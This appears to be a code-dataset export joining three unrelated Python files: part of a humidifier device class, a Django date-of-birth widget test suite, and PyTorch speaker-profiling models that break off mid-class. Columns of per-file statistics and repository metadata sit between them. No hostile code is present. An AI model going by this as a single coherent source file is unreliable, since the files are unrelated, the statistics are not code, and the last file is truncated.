('Auto Target Humidity: ',
self.config['auto_target_humidity'], 'percent'),
('Automatic Stop: ', self.config['automatic_stop'], ''),
]
if self.night_light:
disp1.append(('Night Light Brightness: ',
self.details['night_light_brightness'], 'percent'))
for line in disp1:
print(f'{line[0]:.<29} {line[1]} {line[2]}')
def displayJSON(self) -> str:
"""Return air purifier status and properties in JSON output."""
sup = super().displayJSON()
sup_val = json.loads(sup)
sup_val.update(
{
'Mode': self.details['mode'],
'Humidity': str(self.details['humidity']),
'Mist Virtual Level': str(
self.details['mist_virtual_level']),
'Mist Level': str(self.details['mist_level']),
'Water Lacks': self.details['water_lacks'],
'Humidity High': self.details['humidity_high'],
'Water Tank Lifted': self.details['water_tank_lifted'],
'Display': self.details['display'],
'Automatic Stop Reach Target': self.details[
'automatic_stop_reach_target'],
'Auto Target Humidity': str(self.config[
'auto_target_humidity']),
'Automatic Stop': self.config['automatic_stop'],
}
)
if self.night_light:
sup_val['Night Light Brightness'] = self.details[
'night_light_brightness']
return json.dumps(sup_val)
| 33.585685
| 77
| 0.535574
| 5,255
| 48,800
| 4.839391
| 0.049477
| 0.041092
| 0.011797
| 0.016515
| 0.855924
| 0.82946
| 0.817231
| 0.790924
| 0.760175
| 0.741772
| 0
| 0.014193
| 0.33875
| 48,800
| 1,452
| 78
| 33.608815
| 0.773901
| 0.081291
| 0
| 0.744718
| 0
| 0
| 0.188563
| 0.02814
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083627
| false
| 0.037852
| 0.004401
| 0
| 0.220951
| 0.003521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b7884e10691241015a93d96a4ffea4d0d4d66b
| 22,718
|
py
|
Python
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 2
|
2018-03-22T15:50:10.000Z
|
2020-03-26T06:09:46.000Z
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 5
|
2017-02-09T20:21:11.000Z
|
2021-04-16T20:18:10.000Z
|
tests/test_app/tests/test_widget.py
|
MatthewWilkes/django-dob-widget
|
1d6f721dfa700138724064cd9c635f404ca0171b
|
[
"MIT"
] | 1
|
2017-02-09T20:14:27.000Z
|
2017-02-09T20:14:27.000Z
|
import datetime
from unittest import TestCase
from distutils.version import StrictVersion
import pytest
import django
from dobwidget import DateOfBirthWidget
from ..models import Person
from ..forms import PersonModelForm, DMYPersonModelForm, MDYPersonModelForm, YMDPersonModelForm
django_version = django.get_version()
is_gt_dj110 = StrictVersion(django_version) >= StrictVersion('1.10.0')
@pytest.mark.django_db
class SimpleTestCase(TestCase):
def setUp(self):
super(SimpleTestCase, self).setUp()
self.person = Person(name="A person", date_of_birth=datetime.date(2000, 4, 4))
def test_raw(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
)
form = PersonModelForm()
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_instance(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
)
form = PersonModelForm(instance=self.person)
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_POST(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '3',
'date_of_birth_1': '5',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class DMYTestCase(SimpleTestCase):
def test_raw(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
)
form = DMYPersonModelForm()
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_instance(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="4" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
)
form = DMYPersonModelForm(instance=self.person)
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_POST(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="3" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = DMYPersonModelForm({
'name': 'Example',
'date_of_birth_0': '3',
'date_of_birth_1': '5',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class MDYTestCase(SimpleTestCase):
def test_raw(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" required />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" required />'
)
form = MDYPersonModelForm()
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_instance(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="4" />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="4" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="4" required />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="4" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2000" required />'
)
form = MDYPersonModelForm(instance=self.person)
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_POST(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="5" />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="3" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="12" min="1" name="date_of_birth_0" placeholder="MM" type="number" value="5" required />'
u'<input id="id_date_of_birth_1" max="31" min="1" name="date_of_birth_1" placeholder="DD" type="number" value="3" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = MDYPersonModelForm({
'name': 'Example',
'date_of_birth_0': '5',
'date_of_birth_1': '3',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
@pytest.mark.django_db
class YMDTestCase(SimpleTestCase):
def test_raw(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" required />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" required />'
)
form = YMDPersonModelForm()
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_instance(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2000" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="4" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2000" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="4" required />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="4" required />'
)
form = YMDPersonModelForm(instance=self.person)
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_POST(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2001" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="3" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="9999" min="1" name="date_of_birth_0" placeholder="YYYY" type="number" value="2001" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="5" required />'
u'<input id="id_date_of_birth_2" max="31" min="1" name="date_of_birth_2" placeholder="DD" type="number" value="3" required />'
)
form = YMDPersonModelForm({
'name': 'Example',
'date_of_birth_0': '2001',
'date_of_birth_1': '5',
'date_of_birth_2': '3',
})
field = form['date_of_birth']
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(year=2001, month=5, day=3))
class BadOptionsTestCase(TestCase):
def test_duplicate_order_elements_disallowed(self):
with pytest.raises(ValueError):
DateOfBirthWidget(order='YYMD')
DateOfBirthWidget(order='YYD')
def test_invalid_options_disallowed(self):
with pytest.raises(ValueError):
DateOfBirthWidget(order='YMZ')
def test_lowercase_disallowed(self):
with pytest.raises(ValueError):
DateOfBirthWidget(order='Ymd')
def test_partial_options_disallowed(self):
with pytest.raises(ValueError):
DateOfBirthWidget(order='YM')
class InvalidInputTestCase(TestCase):
def test_single_invalid_input_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="a" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="b" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="a" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="b" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': 'a',
'date_of_birth_1': 'b',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_invalid_month_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="1" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="14" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="1" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="14" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '1',
'date_of_birth_1': '14',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_invalid_date_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="29" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="29" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="2001" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '29',
'date_of_birth_1': '2',
'date_of_birth_2': '2001',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
def test_invalid_date_far_future_is_equivalent_to_raw_text_inputs_but_invalid(self):
expected_lt_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="21" />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="198000000000000" />'
)
expected_gte_dj110 = (
u'<input id="id_date_of_birth_0" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" value="21" required />'
u'<input id="id_date_of_birth_1" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" value="2" required />'
u'<input id="id_date_of_birth_2" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" value="198000000000000" required />'
)
form = PersonModelForm({
'name': 'Example',
'date_of_birth_0': '21',
'date_of_birth_1': '2',
'date_of_birth_2': '198000000000000',
})
field = form['date_of_birth']
self.assertFalse(form.is_valid())
self.assertIn('date_of_birth', form.errors)
self.assertEqual(
field.as_widget(),
expected_gte_dj110 if is_gt_dj110 else expected_lt_dj110
)
class AttributesTestCase(TestCase):
def test_attrs_can_be_specified_per_field(self):
widget = DateOfBirthWidget(
attrs={'data-foo': 'bar'},
day_attrs={'data-type': 'day'},
month_attrs={'data-type': 'month'},
year_attrs={'data-type': 'year'},
)
self.assertEqual(
widget.render('date_of_birth', None),
u'<input data-foo="bar" data-type="day" max="31" min="1" name="date_of_birth_0" placeholder="DD" type="number" />'
u'<input data-foo="bar" data-type="month" max="12" min="1" name="date_of_birth_1" placeholder="MM" type="number" />'
u'<input data-foo="bar" data-type="year" max="9999" min="1" name="date_of_birth_2" placeholder="YYYY" type="number" />'
)
| 54.349282
| 156
| 0.626772
| 3,314
| 22,718
| 3.971334
| 0.039228
| 0.111694
| 0.204772
| 0.090267
| 0.911709
| 0.907606
| 0.904111
| 0.901071
| 0.89165
| 0.869843
| 0
| 0.061485
| 0.221807
| 22,718
| 417
| 157
| 54.479616
| 0.682957
| 0
| 0
| 0.595238
| 0
| 0.261905
| 0.555419
| 0.195088
| 0
| 0
| 0
| 0
| 0.087302
| 1
| 0.058201
| false
| 0
| 0.021164
| 0
| 0.097884
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be1282d119311979c7fa018e72c5e999fabaf9d1
| 11,018
|
py
|
Python
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 30
|
2021-04-05T10:36:34.000Z
|
2022-03-03T07:06:11.000Z
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 5
|
2021-02-04T19:36:16.000Z
|
2021-09-01T18:29:57.000Z
|
Model/models.py
|
test-dan-run/SpeakerProfiling
|
bcf9b1240fbd58fdd586252729018d43c391b736
|
[
"MIT"
] | 18
|
2021-03-18T07:50:39.000Z
|
2022-03-30T10:47:11.000Z
|
import torch
import torch.nn as nn
import wavencoder
# from transformers import Wav2Vec2Model
# torch.use_deterministic_algorithms(True)
class Wav2VecLSTM(nn.Module):
def __init__(self, lstm_h, lstm_inp=512):
super().__init__()
self.encoder = wavencoder.models.Wav2Vec(pretrained=True)
for param in self.encoder.parameters():
param.requires_grad = False
for param in self.encoder.feature_extractor.conv_layers[5:].parameters():
param.requires_grad = True
self.lstm = nn.LSTM(lstm_inp, lstm_h, batch_first=True)
self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
self.height_regressor = nn.Linear(lstm_h, 1)
self.age_regressor = nn.Linear(lstm_h, 1)
self.gender_classifier = nn.Sequential(
nn.Linear(lstm_h, 1),
nn.Sigmoid()
)
def forward(self, x):
x = self.encoder(x)
output, (hidden, _) = self.lstm(x.transpose(1,2))
attn_output = self.attention(output)
height = self.height_regressor(attn_output)
age = self.age_regressor(attn_output)
gender = self.gender_classifier(attn_output)
return height, age, gender
class SpectralLSTM(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.lstm = nn.LSTM(128, lstm_h, batch_first=True)
self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
self.height_regressor = nn.Sequential(
nn.Linear(lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1))
self.age_regressor = nn.Sequential(
nn.Linear(lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1))
self.gender_classifier = nn.Sequential(
nn.Linear(lstm_h, lstm_h),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(lstm_h, 1),
nn.Sigmoid())
def forward(self, x):
x = x.squeeze(1)
output, (hidden, _) = self.lstm(x.transpose(1,2))
attn_output = self.attention(output)
height = self.height_regressor(attn_output)
age = self.age_regressor(attn_output)
gender = self.gender_classifier(attn_output)
return height, age, gender
class SpectralCNNLSTM(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.encoder = nn.Sequential(
nn.Conv1d(40, int(lstm_h/2), 5),
nn.ReLU(),
nn.BatchNorm1d(int(lstm_h/2)),
nn.Conv1d(int(lstm_h/2), int(lstm_h/2), 5),
nn.ReLU(),
nn.BatchNorm1d(int(lstm_h/2)),
)
self.lstm = nn.LSTM(int(lstm_h/2), int(lstm_h/2), batch_first=True)
self.attention = wavencoder.layers.SoftAttention(int(lstm_h/2), int(lstm_h/2))
self.height_regressor = nn.Sequential(
nn.Linear(int(lstm_h/2), int(lstm_h/2)),
nn.ReLU(),
nn.Linear(int(lstm_h/2), 1))
self.age_regressor = nn.Sequential(
nn.Linear(int(lstm_h/2), int(lstm_h/2)),
nn.ReLU(),
nn.Linear(int(lstm_h/2), 1))
self.gender_classifier = nn.Sequential(
nn.Linear(int(lstm_h/2), int(lstm_h/2)),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(int(lstm_h/2), 1),
nn.Sigmoid())
def forward(self, x):
x = x.squeeze(1)
x = self.encoder(x)
output, (hidden, _) = self.lstm(x.transpose(1,2))
attn_output = self.attention(output)
height = self.height_regressor(attn_output)
age = self.age_regressor(attn_output)
gender = self.gender_classifier(attn_output)
return height, age, gender
class SpectralMultiScale(nn.Module):
def __init__(self, lstm_h):
super().__init__()
inp_dim = 40
self.lstm_h = lstm_h
self.cnn3 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
nn.Conv1d(inp_dim, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
TransposeAttn(lstm_h)
)
self.cnn5 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
nn.Conv1d(inp_dim, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
TransposeAttn(lstm_h)
)
self.cnn7 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
nn.Conv1d(inp_dim, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
TransposeAttn(lstm_h)
)
self.height_regressor = nn.Sequential(
nn.Linear(3*lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1),
)
self.age_regressor = nn.Sequential(
nn.Linear(3*lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1),
)
self.gender_regressor = nn.Sequential(
nn.Linear(3*lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1),
nn.Sigmoid()
)
def forward(self, x):
x = x.squeeze(1)
fm3 = self.cnn3(x).view(-1, self.lstm_h)
fm5 = self.cnn5(x).view(-1, self.lstm_h)
fm7 = self.cnn7(x).view(-1, self.lstm_h)
fm = torch.cat([fm3, fm5, fm7], 1)
height = self.height_regressor(fm)
age = self.age_regressor(fm)
gender = self.gender_regressor(fm)
return height, age, gender
# height only models
class TransposeLSTM(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.lstm = nn.LSTM(lstm_h, lstm_h, batch_first=True)
# self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
def forward(self, x):
output, (hidden, _) = self.lstm(x.transpose(1,2))
# attn_output = self.attention(output)
attn_output = output[:, -1, :]
return attn_output
class TransposeAttn(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
def forward(self, x):
attn_output = self.attention(x.transpose(1,2))
return attn_output
class MultiScaleH(nn.Module):
def __init__(self, lstm_h):
super().__init__()
inp_dim = 40
self.lstm_h = lstm_h
self.cnn3 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
nn.Conv1d(inp_dim, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 3),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
# nn.MaxPool1d(2,2),
# nn.MaxPool1d(2,2),
# TransposeLSTM(lstm_h)
TransposeAttn(lstm_h)
)
self.cnn5 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
nn.Conv1d(inp_dim, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 5),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
# nn.MaxPool1d(2,2),
# TransposeLSTM(lstm_h)
TransposeAttn(lstm_h)
)
self.cnn7 = nn.Sequential(
nn.BatchNorm1d(inp_dim),
